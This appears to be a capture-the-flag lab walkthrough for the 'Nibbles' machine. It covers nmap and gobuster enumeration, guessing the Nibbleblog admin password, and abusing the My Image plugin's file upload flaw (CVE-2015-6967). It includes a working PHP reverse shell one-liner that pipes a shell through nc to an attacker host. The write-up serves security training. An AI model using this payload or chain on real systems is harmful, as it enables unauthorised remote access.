
Nibbles Initial Foothold

ℹ️ Information


Question

Gain a foothold on the target and submit the user.txt flag

📋 Walkthrough

Start with an nmap version and default-script scan (-sVC combines -sV and -sC):

nmap -sVC [IP]
This is the output:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So there is a web server on port 80. From the previous section we know that a blog lives under the path /nibbleblog/. Let's use gobuster to look for interesting pages under it:
gobuster dir -u http://10.129.100.239/nibbleblog/ -w=/usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.100.239/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 309]
/.hta                 (Status: 403) [Size: 304]
/.htpasswd            (Status: 403) [Size: 309]
/admin                (Status: 301) [Size: 327] [--> http://10.129.100.239/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 301) [Size: 329] [--> http://10.129.100.239/nibbleblog/content/]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 301) [Size: 331] [--> http://10.129.100.239/nibbleblog/languages/]
/plugins              (Status: 301) [Size: 329] [--> http://10.129.100.239/nibbleblog/plugins/]
/README               (Status: 200) [Size: 4628]
/themes               (Status: 301) [Size: 328] [--> http://10.129.100.239/nibbleblog/themes/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
There is an admin.php login page. In the content folder there is a file named users.xml that reveals the admin username. I tried a few default passwords such as admin:admin and admin:password, then guessed correctly: the credentials are admin:nibbles. Note that Nibbleblog counts failed logins and blacklists the source IP after a handful of bad attempts, so guess sparingly rather than brute-forcing the form. The content folder also holds a plugins directory where the installed plugins keep their data.

As seen in the previous section, the My Image plugin does not validate the type of the file it is given, so an authenticated admin can upload a PHP file through it (CVE-2015-6967). Let's create a PHP reverse shell:

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [LOCAL_IP] 1234 >/tmp/f"); ?>
Now start a netcat listener on the port used in the payload:
nc -lnvp 1234
Upload the file through the plugin's configuration page in the admin panel, then trigger the shell by browsing to http://10.129.100.239/nibbleblog/content/private/plugins/my_image/image.php (the plugin saves the upload as image.<original extension>, so a .php upload becomes image.php).
$ whoami
nibbler
$ 
Now read the user.txt flag from nibbler's home directory:
$ cd /home/nibbler 
$ ls
personal.zip
user.txt
$ 

Answer

[REDACTED]